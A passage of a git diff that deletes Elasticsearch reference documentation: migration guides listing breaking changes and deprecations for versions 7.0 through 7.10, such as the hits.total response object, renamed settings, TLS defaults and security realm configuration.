-[[semantics-changed-max-concurrent-shared-requests]] -==== Semantics changed for `max_concurrent_shard_requests` - -`max_concurrent_shard_requests` used to limit the total number of concurrent shard -requests a single high level search request can execute. In 7.0 this changed to be the -max number of concurrent shard requests per node. The default is now `5`. - -[discrete] -[[max-score-set-to-null-when-untracked]] -==== `max_score` set to `null` when scores are not tracked - -`max_score` used to be set to `0` whenever scores are not tracked. `null` is now used -instead which is a more appropriate value for a scenario where scores are not available. - -[discrete] -==== Negative boosts are not allowed - -Setting a negative `boost` for a query or a field, deprecated in 6x, is not allowed in this version. -To deboost a specific query or field you can use a `boost` comprise between 0 and 1. - -[discrete] -==== Negative scores are not allowed in Function Score Query - -Negative scores in the Function Score Query are deprecated in 6.x, and are -not allowed in this version. If a negative score is produced as a result -of computation (e.g. in `script_score` or `field_value_factor` functions), -an error will be thrown. - -[discrete] -==== The filter context has been removed - -The `filter` context has been removed from Elasticsearch's query builders, -the distinction between queries and filters is now decided in Lucene depending -on whether queries need to access score or not. As a result `bool` queries with -`should` clauses that don't need to access the score will no longer set their -`minimum_should_match` to 1. This behavior has been deprecated in the previous -major version. - -//tag::notable-breaking-changes[] -[discrete] -[[hits-total-now-object-search-response]] -==== `hits.total` is now an object in the search response - -The total hits that match the search request is now returned as an object -with a `value` and a `relation`. `value` indicates the number of hits that -match and `relation` indicates whether the value is accurate (`eq`) or a lower bound -(`gte`): - -[source,js] --------------------------------------------------- -{ - "hits": { - "total": { - "value": 1000, - "relation": "eq" - }, - ... - } -} --------------------------------------------------- -// NOTCONSOLE - -The `total` object in the response indicates that the query matches exactly 1000 -documents ("eq"). The `value` is always accurate (`"relation": "eq"`) when -`track_total_hits` is set to true in the request. -You can also retrieve `hits.total` as a number in the rest response by adding -`rest_total_hits_as_int=true` in the request parameter of the search request. -This parameter has been added to ease the transition to the new format and -will be removed in the next major version (8.0). -//end::notable-breaking-changes[] - -[discrete] -[[hits-total-omitted-if-disabled]] -==== `hits.total` is omitted in the response if `track_total_hits` is disabled (false) - -If `track_total_hits` is set to `false` in the search request the search response -will set `hits.total` to null and the object will not be displayed in the rest -layer. You can add `rest_total_hits_as_int=true` in the search request parameters -to get the old format back (`"total": -1`). - -//tag::notable-breaking-changes[] -[discrete] -[[track-total-hits-10000-default]] -==== `track_total_hits` defaults to 10,000 - -By default search request will count the total hits accurately up to `10,000` -documents. If the total number of hits that match the query is greater than this - value, the response will indicate that the returned value is a lower bound: - -[source,js] --------------------------------------------------- -{ - "_shards": ... - "timed_out": false, - "took": 100, - "hits": { - "max_score": 1.0, - "total": { - "value": 10000, <1> - "relation": "gte" <2> - }, - "hits": ... - } -} --------------------------------------------------- -// NOTCONSOLE - -<1> There are at least 10000 documents that match the query -<2> This is a lower bound (`"gte"`). - -You can force the count to always be accurate by setting `track_total_hits` -to true explicitly in the search request. -//end::notable-breaking-changes[] - -[discrete] -==== Limitations on Similarities -Lucene 8 introduced more constraints on similarities, in particular: - -- scores must not be negative, -- scores must not decrease when term freq increases, -- scores must not increase when norm (interpreted as an unsigned long) increases. - -[discrete] -==== Weights in Function Score must be positive -Negative `weight` parameters in the `function_score` are no longer allowed. - -[discrete] -==== Query string and Simple query string limit expansion of fields to 1024 -The number of automatically expanded fields for the "all fields" -mode (`"default_field": "*"`) for the `query_string` and `simple_query_string` -queries is now 1024 fields. diff --git a/docs/reference/migration/migrate_7_0/settings.asciidoc b/docs/reference/migration/migrate_7_0/settings.asciidoc deleted file mode 100644 index 1a5227489c6..00000000000 --- a/docs/reference/migration/migrate_7_0/settings.asciidoc +++ /dev/null @@ -1,290 +0,0 @@ -[discrete] -[[breaking_70_settings_changes]] -=== Settings changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[default-node-name-now-hostname]] -==== The default for `node.name` is now the hostname - -`node.name` now defaults to the hostname at the time when Elasticsearch -is started. Previously the default node name was the first eight characters -of the node id. It can still be configured explicitly in `elasticsearch.yml`. - -[discrete] -==== Percolator - -* The deprecated `index.percolator.map_unmapped_fields_as_string` setting has been removed in favour of - the `index.percolator.map_unmapped_fields_as_text` setting. - -[discrete] -==== Index thread pool - -* Internally, single-document index/delete/update requests are executed as bulk - requests with a single-document payload. This means that these requests are - executed on the bulk thread pool. As such, the indexing thread pool is no - longer needed and has been removed. As such, the settings - `thread_pool.index.size` and `thread_pool.index.queue_size` have been removed. - -[discrete] -[[write-thread-pool-fallback]] -==== Write thread pool fallback - -* The bulk thread pool was replaced by the write thread pool in 6.3.0. However, - for backwards compatibility reasons the name `bulk` was still usable as fallback - settings `thread_pool.bulk.size` and `thread_pool.bulk.queue_size` for - `thread_pool.write.size` and `thread_pool.write.queue_size`, respectively, and - the system property `es.thread_pool.write.use_bulk_as_display_name` was - available to keep the display output in APIs as `bulk` instead of `write`. - These fallback settings and this system property have been removed. - -[discrete] -==== Disabling memory-mapping - -* The setting `node.store.allow_mmapfs` has been renamed to `node.store.allow_mmap`. - -[discrete] -[[remove-http-enabled]] -==== Http enabled setting removed - -* The setting `http.enabled` previously allowed disabling binding to HTTP, only allowing -use of the transport client. This setting has been removed, as the transport client -will be removed in the future, thus requiring HTTP to always be enabled. - -[discrete] -[[remove-http-pipelining-setting]] -==== Http pipelining setting removed - -* The setting `http.pipelining` previously allowed disabling HTTP pipelining support. -This setting has been removed, as disabling http pipelining support on the server -provided little value. The setting `http.pipelining.max_events` can still be used to -limit the number of pipelined requests in-flight. - -[discrete] -==== Cross-cluster search settings renamed - -The cross-cluster search remote cluster connection infrastructure is also used -in cross-cluster replication. This means that the setting names -`search.remote.*` used for configuring cross-cluster search belie the fact that -they also apply to other situations where a connection to a remote cluster as -used. Therefore, these settings have been renamed from `search.remote.*` to -`cluster.remote.*`. For backwards compatibility purposes, we will fallback to -`search.remote.*` if `cluster.remote.*` is not set. For any such settings stored -in the cluster state, or set on dynamic settings updates, we will automatically -upgrade the setting from `search.remote.*` to `cluster.remote.*`. The fallback -settings will be removed in 8.0.0. - -[discrete] -[[audit-logfile-local-node-info]] -==== Audit logfile local node info - -The following settings have been removed: - -- `xpack.security.audit.logfile.prefix.emit_node_host_address`, instead use - `xpack.security.audit.logfile.emit_node_host_address` -- `xpack.security.audit.logfile.prefix.emit_node_host_name`, instead use - `xpack.security.audit.logfile.emit_node_host_name` -- `xpack.security.audit.logfile.prefix.emit_node_name`, instead use - `xpack.security.audit.logfile.emit_node_name` - -The new settings have the same meaning as the removed ones, but the `prefix` -name component is no longer meaningful as logfile audit entries are structured -JSON documents and are not prefixed by anything. -Moreover, `xpack.security.audit.logfile.emit_node_name` has changed its default -from `true` to `false`. All other settings mentioned before, have kept their -default value of `false`. - -[discrete] -[[include-realm-type-in-setting]] -==== Security realms settings - -The settings for all security realms must now include the realm type as part -of the setting name, and the explicit `type` setting has been removed. - -A realm that was previous configured as: -[source,yaml] --------------------------------------------------- -xpack.security.authc.realms: - ldap1: - type: ldap - order: 1 - url: "ldaps://ldap.example.com/" --------------------------------------------------- - -Must be migrated to: -[source,yaml] --------------------------------------------------- -xpack.security.authc.realms: - ldap.ldap1: - order: 1 - url: "ldaps://ldap.example.com/" --------------------------------------------------- - -Any realm specific secure settings that have been stored in the elasticsearch -keystore (such as ldap bind passwords, or passwords for ssl keys) must be updated -in a similar way. - -[discrete] -[[tls-setting-fallback]] -==== TLS/SSL settings - -The default TLS/SSL settings, which were prefixed by `xpack.ssl`, have been removed. -The removal of these default settings also removes the ability for a component to -fallback to a default configuration when using TLS. Each component (realm, transport, http, -http client, etc) must now be configured with their own settings for TLS if it is being -used. - -[discrete] -[[tls-v1-removed]] -==== TLS v1.0 disabled - -TLS version 1.0 is now disabled by default as it suffers from -https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet#Rule_-_Only_Support_Strong_Protocols[known security issues]. -The default protocols are now TLSv1.3 (if supported), TLSv1.2 and TLSv1.1. - -You can enable TLS v1.0 by configuring the relevant `ssl.supported_protocols` -setting to include `"TLSv1"`. -Depending on your local configuration and the TLS protocols that are in use -on your network, you may need to enable TLS v1.0 support in any or all of the -following places: - -`xpack.security.http.ssl.supported_protocols`:: -For incoming HTTP connections to Elasticsearch's HTTP (Rest) interface. -If there are clients that connect to {es} and do not support newer TLS versions, -you must update this setting. - -`xpack.http.ssl.supported_protocols`:: -For outgoing HTTP connections from {watcher}. -If you have watches that connect to external HTTP servers and do not support -newer TLS versions, you must update this setting. - -`xpack.security.authc.realms.ldap.{name}.ssl.supported_protocols`:: -For outgoing LDAP connections from {es} {security-features}. -If you have an LDAP realm enabled and the LDAP directory to which that realm -connects does not support newer TLS versions, you must update this setting. - -`xpack.security.authc.realms.active_directory.{name}.ssl.supported_protocols`:: -For outgoing Active Directory (LDAP) connections from {es} {security-features}. -If you have an AD realm enabled and the directory server to which that realm -connects does not support newer TLS versions, you must update this setting. - -`xpack.security.authc.realms.saml.{name}.ssl.supported_protocols`:: -For outgoing HTTP connections to retrieve SAML metadata. -If you have a SAML realm enabled and the realm is configured to retrieve -metadata over HTTPS (that is, `idp.metadata.path` is a URL starting with -`https://`) and the web server which hosts the metadata does not support newer -TLS versions, you must update this setting. - -`xpack.security.authc.realms.oidc.{name}.ssl.supported_protocols`:: -For outgoing HTTP connections to an OpenId Connect Provider. -If you have an OpenId Connect ("oidc") realm enabled and the realm is configured -to connect to a remote OpenID Connect Provider which does not support newer TLS -versions, you must update this setting. - -`xpack.monitoring.exporters.{name}.ssl.supported_protocols`:: -For remote monitoring data. -If your monitoring data is exported to a remote monitoring cluster and that -cluster is configured to only support TLSv1, you must update this setting. - -`reindex.ssl.supported_protocols`:: -For reindex from remote. -If you reindex data from a remote {es} cluster which has SSL enabled on the -`http` interface and that cluster is configured to only support TLSv1, you must -update this setting. - -`xpack.security.transport.ssl.supported_protocols`:: -For incoming connections between {es} nodes. If you have specialized network -equipment which inspects TLS packets between your nodes, and that equipment -enforces TLSv1 you must update this setting. - - -The following is an example that enables TLS v1.0 for incoming HTTP connections: -[source,yaml] --------------------------------------------------- -xpack.security.http.ssl.supported_protocols: [ "TLSv1.3", "TLSv1.2", "TLSv1.1", "TLSv1" ] --------------------------------------------------- - -[discrete] -[[trial-explicit-security]] -==== Security on Trial Licenses - -On trial licenses, `xpack.security.enabled` defaults to `false`. - -In prior versions, a trial license would automatically enable security if either - -* `xpack.security.transport.enabled` was `true`; _or_ -* the trial license was generated on a version of X-Pack from 6.2 or earlier. - -This behaviour has been now removed, so security is only enabled if: - -* `xpack.security.enabled` is `true`; _or_ -* `xpack.security.enabled` is not set, and a gold or platinum license is installed. - -[discrete] -[[watcher-notifications-account-settings]] -==== Watcher notifications account settings - -The following settings have been removed in favor of the secure variants. -The <> have to be defined inside each cluster -node's keystore, i.e., they are not to be specified via the cluster settings API. - -- `xpack.notification.email.account..smtp.password`, instead use -`xpack.notification.email.account..smtp.secure_password` -- `xpack.notification.hipchat.account..auth_token`, instead use -`xpack.notification.hipchat.account..secure_auth_token` -- `xpack.notification.jira.account..url`, instead use -`xpack.notification.jira.account..secure_url` -- `xpack.notification.jira.account..user`, instead use -`xpack.notification.jira.account..secure_user` -- `xpack.notification.jira.account..password`, instead use -`xpack.notification.jira.account..secure_password` -- `xpack.notification.pagerduty.account..service_api_key`, instead use -`xpack.notification.pagerduty.account..secure_service_api_key` -- `xpack.notification.slack.account..url`, instead use -`xpack.notification.slack.account..secure_url` - -[discrete] -[[remove-audit-index-output]] -==== Audit index output type removed - -All the settings under the `xpack.security.audit.index` namespace have been -removed. In addition, the `xpack.security.audit.outputs` setting has been -removed as well. - -These settings enabled and configured the audit index output type. This output -type has been removed because it was unreliable in certain scenarios and this -could have lead to dropping audit events while the operations on the system -were allowed to continue as usual. The recommended replacement is the -use of the `logfile` audit output type and using other components from the -Elastic Stack to handle the indexing part. - -[discrete] -[[ingest-user-agent-ecs-always]] -==== Ingest User Agent processor defaults uses `ecs` output format -https://github.com/elastic/ecs[ECS] format is now the default. -The `ecs` setting for the user agent ingest processor now defaults to true. - -[discrete] -[[remove-action-master-force_local]] -==== Remove `action.master.force_local` - -The `action.master.force_local` setting was an undocumented setting, used -internally by the tribe node to force reads to local cluster state (instead of -forwarding to a master, which tribe nodes did not have). Since the tribe -node was removed, this setting was removed too. - -[discrete] -==== Enforce cluster-wide shard limit -The cluster-wide shard limit is now enforced and not optional. The limit can -still be adjusted as desired using the cluster settings API. - -[discrete] -==== HTTP Max content length setting is no longer parsed leniently -Previously, `http.max_content_length` would reset to `100mb` if the setting was -greater than `Integer.MAX_VALUE`. This leniency has been removed. diff --git a/docs/reference/migration/migrate_7_0/snapshotstats.asciidoc b/docs/reference/migration/migrate_7_0/snapshotstats.asciidoc deleted file mode 100644 index 5f181de7b72..00000000000 --- a/docs/reference/migration/migrate_7_0/snapshotstats.asciidoc +++ /dev/null @@ -1,23 +0,0 @@ -[discrete] -[[breaking_70_snapshotstats_changes]] -=== Snapshot stats changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -Snapshot stats details are provided in a new structured way: - -* `total` section for all the files that are referenced by the snapshot. -* `incremental` section for those files that actually needed to be copied over as part of the incremental snapshotting. -* In case of a snapshot that's still in progress, there's also a `processed` section for files that are in the process of being copied. - -[discrete] -[[snapshot-stats-deprecated]] -==== Deprecated `number_of_files`, `processed_files`, `total_size_in_bytes` and `processed_size_in_bytes` snapshot stats properties have been removed - -* Properties `number_of_files` and `total_size_in_bytes` are removed and should be replaced by values of nested object `total`. -* Properties `processed_files` and `processed_size_in_bytes` are removed and should be replaced by values of nested object `processed`. \ No newline at end of file diff --git a/docs/reference/migration/migrate_7_0/suggesters.asciidoc b/docs/reference/migration/migrate_7_0/suggesters.asciidoc deleted file mode 100644 index 49186686523..00000000000 --- a/docs/reference/migration/migrate_7_0/suggesters.asciidoc +++ /dev/null @@ -1,21 +0,0 @@ -[discrete] -[[breaking_70_suggesters_changes]] -=== Suggesters changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Registration of suggesters in plugins has changed - -Plugins must now explicitly indicate the type of suggestion that they produce. - -[discrete] -==== Phrase suggester now multiples alpha -Previously, the laplace smoothing used by the phrase suggester added `alpha`, -when it should instead multiply. This behavior has been changed and will -affect suggester scores. diff --git a/docs/reference/migration/migrate_7_1.asciidoc b/docs/reference/migration/migrate_7_1.asciidoc deleted file mode 100644 index 095fb724eae..00000000000 --- a/docs/reference/migration/migrate_7_1.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[[breaking-changes-7.1]] -== Breaking changes in 7.1 -++++ -7.1 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.1. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[breaking_71_http_changes]] -=== HTTP changes - -[discrete] -==== Deprecation of old HTTP settings - -The `http.tcp_no_delay` setting is deprecated in 7.1. It is replaced by -`http.tcp.no_delay`. - -[discrete] -[[breaking_71_network_changes]] -=== Network changes - -[discrete] -==== Deprecation of old network settings - -The `network.tcp.connect_timeout` setting is deprecated in 7.1. This setting -was a fallback setting for `transport.connect_timeout`. To change the default -connection timeout for client connections, modify `transport.connect_timeout`. - -[discrete] -[[breaking_71_transport_changes]] -=== Transport changes - -//tag::notable-breaking-changes[] -[discrete] -==== Deprecation of old transport settings - -The following settings are deprecated in 7.1. Each setting has a replacement -setting that was introduced in 6.7. - -- `transport.tcp.port` is replaced by `transport.port` -- `transport.tcp.compress` is replaced by `transport.compress` -- `transport.tcp.connect_timeout` is replaced by `transport.connect_timeout` -- `transport.tcp_no_delay` is replaced by `transport.tcp.no_delay` -- `transport.profiles.profile_name.tcp_no_delay` is replaced by -`transport.profiles.profile_name.tcp.no_delay` -- `transport.profiles.profile_name.tcp_keep_alive` is replaced by -`transport.profiles.profile_name.tcp.keep_alive` -- `transport.profiles.profile_name.reuse_address` is replaced by -`transport.profiles.profile_name.tcp.reuse_address` -- `transport.profiles.profile_name.send_buffer_size` is replaced by `transport.profiles.profile_name.tcp.send_buffer_size` -- `transport.profiles.profile_name.receive_buffer_size` is replaced by `transport.profiles.profile_name.tcp.receive_buffer_size` - -// end::notable-breaking-changes[] - - - diff --git a/docs/reference/migration/migrate_7_10.asciidoc b/docs/reference/migration/migrate_7_10.asciidoc deleted file mode 100644 index 3d522114a21..00000000000 --- a/docs/reference/migration/migrate_7_10.asciidoc +++ /dev/null @@ -1,233 +0,0 @@ -[[migrating-7.10]] -== Migrating to 7.10 -++++ -7.10 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to {es} 7.10. - -See also <> and <>. - -// * <> -// * <> - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - - - -[discrete] -[[breaking-changes-7.10]] -=== Breaking changes - -The following changes in {es} 7.10 might affect your applications -and prevent them from operating normally. -Before upgrading to 7.10, review these changes and take the described steps -to mitigate the impact. - -NOTE: Breaking changes introduced in minor versions are -normally limited to security and bug fixes. -Significant changes in behavior are deprecated in a minor release and -the old behavior is supported until the next major release. -To find out if you are using any deprecated functionality, -enable <>. - - -//tag::notable-breaking-changes[] - -[discrete] -[[breaking_710_security_changes]] -==== Authentication changes - -[[api-keys-require-name-property]] -.API keys now require a `name` property. -[%collapsible] -==== -*Details* + -The `name` property is now required to create or grant an API key. - -[source,js] ----- -{ - "...": "...", - "api_key": { - "name": "key-1" - } -} ----- -// NOTCONSOLE - -*Impact* + -To avoid errors, specify the `name` property when creating or granting API keys. -==== - -[discrete] -[[breaking_710_java_changes]] -==== Java changes - -[[supplier-searchlookup-arg]] -.The `MappedFieldType#fielddataBuilder` method now accepts a `Supplier` argument. -[%collapsible] -==== -*Details* + -To support future feature development, the existing -`MappedFieldType#fielddataBuilder` method now accepts a new -`Supplier` argument. - -*Impact* + -If you develop or maintain a mapper plugin, update your implementation of the -`MappedFieldType#fielddataBuilder` method to accommodate the new signature. -==== - -[discrete] -[[breaking_710_networking_changes]] -==== Networking changes - -[keep-idle-and-keep-internal-limits] -.The `*.tcp.keep_idle` and `*.tcp.keep_interval` settings are now limited to `300` seconds. -[%collapsible] -==== -*Details* + -The `{network,transport,http}.tcp.keep_idle` and -`{network,transport,http}.tcp.keep_interval` settings now have a maximum -value of `300` seconds, equivalent to 5 minutes. - -*Impact* + -If specified, ensure the `{network,transport,http}.tcp.keep_idle` and -`{network,transport,http}.tcp.keep_interval` settings do not exceed `300` -seconds. Setting `{network,transport,http}.tcp.keep_idle` or -`{network,transport,http}.tcp.keep_interval` to a value greater than `300` -seconds in `elasticsearch.yml` will result in an error on startup. -==== - -[discrete] -[[breaking_710_search_changes]] -==== Search changes - -[[max-doc-value-field-search-limits]] -.The `index.max_docvalue_fields_search` setting now limits doc value fields returned by `inner_hits` or the `top_hits` aggregation. -[%collapsible] -==== -*Details* + -The `index.max_docvalue_fields_search` setting limits the number of doc value -fields retrieved by a search. Previously, this setting applied only to doc value -fields returned by the `docvalue_fields` parameter in a top-level search. The -setting now also applies to doc value fields returned by an `inner_hits` section -or `top_hits` aggregation. - -*Impact* + -If you use `inner_hits` or the `top_hits` aggregation, ensure -`index.max_docvalue_fields_search` is configured correctly for your use case. -==== - -//end::notable-breaking-changes[] - -[discrete] -[[deprecated-7.10]] -=== Deprecations - -The following functionality has been deprecated in {es} 7.10 -and will be removed in 8.0 -While this won't have an immediate impact on your applications, -we strongly encourage you take the described steps to update your code -after upgrading to 7.10. - -NOTE: Significant changes in behavior are deprecated in a minor release and -the old behavior is supported until the next major release. -To find out if you are using any deprecated functionality, -enable <>. - -[discrete] -[[breaking_710_indices_changes]] -==== Indices deprecations - -[[bc-deprecate-rest-api-access-to-system-indices]] -.REST API access to system indices is deprecated. -[%collapsible] -==== -*Details* + -We are deprecating REST API access to system indices. Most REST API requests -that attempt to access system indices will return the following deprecation -warning: - -[source,text] ----- -this request accesses system indices: [.system_index_name], but in a future -major version, direct access to system indices will be prevented by default ----- - -The following REST API endpoints access system indices as part of their -implementation and will not return the deprecation warning: - -* `GET _cluster/health` -* `GET {index}/_recovery` -* `GET _cluster/allocation/explain` -* `GET _cluster/state` -* `POST _cluster/reroute` -* `GET {index}/_stats` -* `GET {index}/_segments` -* `GET {index}/_shard_stores` -* `GET _cat/[indices,aliases,health,recovery,shards,segments]` - -*Impact* + -To avoid deprecation warnings, do not use unsupported REST APIs to access system -indices. -==== - -[discrete] -[[breaking_710_ml_changes]] -==== Machine learning deprecations - -[[ml-allow-no-deprecations]] -.The `allow_no_jobs` and `allow_no_datafeeds` API parameters are deprecated. -[%collapsible] -==== -*Details* + -The `allow_no_jobs` and `allow_no_datafeeds` parameters in {ml} APIs are -deprecated in favor of `allow_no_match`. The old parameters are still accepted -by the APIs but a deprecation warning is emitted when the old parameter name is -used in the request body or as a request parameter. High-level REST client -classes now send the new `allow_no_match` parameter. - -*Impact* + -To avoid deprecation warnings, use the `allow_no_match` parameter. -==== - -[discrete] -[[breaking_710_mapping_changes]] -==== Mapping deprecations - -[[mapping-boosts]] -.The `boost` parameter on field mappings has been deprecated. -[%collapsible] -==== -*Details* + -Index-time boosts have been deprecated since the 5.x line, but it is still possible -to declare field-specific boosts in the mappings. This is now deprecated as well, -and will be removed entirely in 8.0.0. Mappings containing field boosts will continue -to work in 7.x but will emit a deprecation warning. - -*Impact* + -The `boost` setting should be removed from templates and mappings. Use boosts -directly on queries instead. -==== - -[discrete] -[[breaking_710_snapshot_restore_changes]] -==== Snapshot and restore deprecations - -[[respository-stats-api-deprecated]] -.The repository stats API has been deprecated. -[%collapsible] -==== -*Details* + -The repository stats API was introduced as an experimental API in 7.8.0. The -{ref}/repositories-metering-apis.html[repositories metering APIs] now replace the -repository stats API. The repository stats API has been deprecated and will be -removed in 8.0.0. - -*Impact* + -Use the {ref}/repositories-metering-apis.html[repositories metering APIs]. -Discontinue use of the repository stats API. -==== diff --git a/docs/reference/migration/migrate_7_2.asciidoc b/docs/reference/migration/migrate_7_2.asciidoc deleted file mode 100644 index a16a3db1870..00000000000 --- a/docs/reference/migration/migrate_7_2.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[breaking-changes-7.2]] -== Breaking changes in 7.2 -++++ -7.2 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.2. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -[discrete] -[[breaking_72_discovery_changes]] -=== Discovery changes - -[discrete] -==== Only a single port may be given for each seed host. - -In earlier versions you could include a range of ports in entries in the -`discovery.seed_hosts` list, but {es} used only the first port in the range and -unexpectedly ignored the rest. For instance if you set `discovery.seed_hosts: -"10.11.12.13:9300-9310"` then {es} would only use `10.11.12.13:9300` for -discovery. Seed host addresses containing port ranges are now rejected. - -// end::notable-breaking-changes[] \ No newline at end of file diff --git a/docs/reference/migration/migrate_7_3.asciidoc b/docs/reference/migration/migrate_7_3.asciidoc deleted file mode 100644 index 21e44da86ef..00000000000 --- a/docs/reference/migration/migrate_7_3.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ -[[breaking-changes-7.3]] -== Breaking changes in 7.3 -++++ -7.3 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.3. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] -[discrete] -[[breaking_73_api_changes]] -=== API changes - -[discrete] -==== {dataframe-transform-cap} API changes - -It is no longer possible to supply the `format` parameter when you define a -`date_histogram` {dataframe-transform} pivot. Previously constructed transforms -will still run but the configured `format` will be ignored. - -[discrete] -[[breaking_73_mapping_changes]] -=== Mapping changes -`dense_vector` field now requires `dims` parameter, specifying the number of -dimensions for document and query vectors for this field. - -[discrete] -==== Defining multi-fields within multi-fields - -Previously, it was possible to define a multi-field within a multi-field. -Defining chained multi-fields is now deprecated and will no longer be supported -in 8.0. To resolve the issue, all instances of `fields` that occur within a -`fields` block should be removed from the mappings, either by flattening the -chained `fields` blocks into a single level, or by switching to `copy_to` if -appropriate. - -[discrete] -[[breaking_73_plugin_changes]] -=== Plugins changes - -[discrete] -==== IndexStorePlugin changes - -IndexStore and DirectoryService have been replaced by a stateless and simple -DirectoryFactory interface to create custom Lucene directory instances per shard. - - -[discrete] -[[breaking_73_search_changes]] -=== Search changes - -[discrete] -==== Deprecation of queries - -The `common` query has been deprecated. The same functionality can be achieved -by the `match` query if the total number of hits is not tracked. - -[discrete] -===== Deprecation of query parameters - -The `cutoff_frequency` parameter has been deprecated for `match` and `multi_match` -queries. The same functionality can be achieved without any configuration provided -that the total number of hits is not tracked. - -[discrete] -[[breaking_73_ccr_changes]] -=== CCR changes - -[discrete] -==== Directly modifying aliases of follower indices is no longer allowed - -Aliases are now replicated to a follower from its leader, so directly modifying -aliases on follower indices is no longer allowed. -// end::notable-breaking-changes[] \ No newline at end of file diff --git a/docs/reference/migration/migrate_7_4.asciidoc b/docs/reference/migration/migrate_7_4.asciidoc deleted file mode 100644 index 5a87ddd0c52..00000000000 --- a/docs/reference/migration/migrate_7_4.asciidoc +++ /dev/null @@ -1,208 +0,0 @@ -[[breaking-changes-7.4]] -== Breaking changes in 7.4 -++++ -7.4 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.4. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -//end::notable-breaking-changes[] - -[discrete] -[[breaking_74_plugin_changes]] -=== Plugins changes - -[discrete] -==== TokenizerFactory changes - -TokenizerFactory now has a `name()` method that must be implemented. Most -plugin-provided TokenizerFactory implementations will extend `AbstractTokenizerFactory`, -which now takes a `name` parameter in its constructor. - -[discrete] -[[breaking_74_search_changes]] -=== Search Changes - -[discrete] -==== Forbid empty doc values in vector functions -If a document doesn't have a value for a vector field (dense_vector -or sparse_vector) on which a vector function is executed, an error will -be thrown. - -[discrete] -==== Use float instead of double for query vectors -Previously, vector functions like `cosineSimilarity` represented the query -vector as an list of doubles. Now vector functions use floats, which matches -how the stored document vectors are represented. - -[discrete] -[[breaking_74_snapshots_changes]] -=== Snapshot and Restore changes - -[discrete] -==== The S3 repository plugin uses the DNS style access pattern by default - -Starting in version 7.4 the `repository-s3` plugin does not use the -now-deprecated path-style access pattern by default. In versions 7.0, 7.1, 7.2 -and 7.3 the `repository-s3` plugin always used the path-style access pattern. -This is a breaking change for deployments that only support path-style access -but which are recognized as supporting DNS-style access by the AWS SDK. If your -deployment only supports path-style access and is affected by this change then -you must configure the S3 client setting `path_style_access` to `true`. This -breaking change was made necessary by -https://aws.amazon.com/blogs/aws/amazon-s3-path-deprecation-plan-the-rest-of-the-story/[AWS's -announcement] that the path-style access pattern is deprecated and will be -unsupported on buckets created after September 30th 2020. - -[discrete] -[[breaking_74_http_changes]] -=== HTTP changes - -[discrete] -==== Changes to Encoding Plus Signs in URLs - -Starting in version 7.4, a `+` in a URL will be encoded as `%2B` by all REST API functionality. Prior versions handled a `+` as a single space. -If your application requires handling `+` as a single space you can return to the old behaviour by setting the system property -`es.rest.url_plus_as_space` to `true`. Note that this behaviour is deprecated and setting this system property to `true` will cease -to be supported in version 8. - -[discrete] -[[breaking_74_cluster_changes]] -=== Cluster changes - -[discrete] -==== Rerouting after starting a shard runs at lower priority - -After starting each shard the elected master node must perform a reroute to -search for other shards that could be allocated. In particular, when creating -an index it is this task that allocates the replicas once the primaries have -started. In versions prior to 7.4 this task runs at priority `URGENT`, but -starting in version 7.4 its priority is reduced to `NORMAL`. In a -well-configured cluster this reduces the amount of work the master must do, but -means that a cluster with a master that is overloaded with other tasks at -`HIGH` or `URGENT` priority may take longer to allocate all replicas. - -Additionally, before 7.4 the `GET -_cluster_health?wait_for_no_initializing_shards` and `GET -_cluster/health?wait_for_no_relocating_shards` APIs would return only once all -pending reroutes have completed too, but starting in version 7.4 if you want to -wait for the rerouting process to completely finish you should add the -`wait_for_events=languid` query parameter when calling these APIs. - -[discrete] -[[breaking_74_allocation_changes]] -=== Allocation changes - -[discrete] -==== Auto-release of read-only-allow-delete block - -If a node exceeds the flood-stage disk watermark then {es} adds the -`index.blocks.read_only_allow_delete` block to all of its indices to prevent -further writes, as a last-resort attempt to prevent the node completely -exhausting its disk space. In earlier versions this block would remain in place -until manually removed, causing confusion for users who currently have ample -disk space and who are not aware that they nearly ran out at some point in the -past. From 7.4 onwards the block is automatically removed when the node drops -below the high watermark again, with the expectation that the high watermark is -some distance below the flood-stage watermark and therefore the disk space -problem is truly resolved. Since this block may be automatically removed, you -can no longer rely on adding this block manually to prevent writes to an index. -You should use the `index.blocks.read_only` block instead. This behaviour can -be disabled by setting the system property -`es.disk.auto_release_flood_stage_block` to `false`. - -[discrete] -[[breaking_74_settings_changes]] -=== Settings changes - -[discrete] -[[breaking_74_unique_realm_names]] -==== Authentication realm name uniqueness is enforced - -Authentication realm name uniqueness is now enforced. If you configure more than one realm of any type -with the same name, the node fails to start. - -[discrete] -[[deprecate-pidfile]] -==== `pidfile` setting is being replaced by `node.pidfile` - -To ensure that all settings are in a proper namespace, the `pidfile` setting is -deprecated, and will be removed in version 8.0.0. Instead, use `node.pidfile`. - -[discrete] -[[deprecate-processors]] -==== `processors` setting is being replaced by `node.processors` - -To ensure that all settings are in a proper namespace, 